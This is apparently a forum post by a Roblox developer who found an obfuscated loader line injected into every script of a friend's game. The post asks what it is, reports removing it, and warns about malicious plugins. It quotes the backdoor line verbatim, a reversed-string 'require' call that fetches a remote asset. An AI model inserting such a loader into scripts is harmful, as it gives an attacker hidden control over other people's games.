Recently while helping my friend make his game, I noticed this line inside EVERY script:
--[[ Last synced 9/26/2020 04:22 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--
What is this?
It definitley looks like a backdoor, but what is it exactly and how do I get rid of it?
Also it comes back after I remove the line
EDIT: Managed to get rid of it with RoDefender, it was named “AntiVirus”
Had to clear out the scripts manually though
EDIT 2: This post seems to get a lot of traction, so my advice is just to watch out for plugins. All the scripts changed while in studio, so a normal model/script cant do that. It was probably one of my friends plugins, since this appeared only in his team create game. So just watch out for any suspicious plugins, and download only the official ones (check if the creator is not a group!)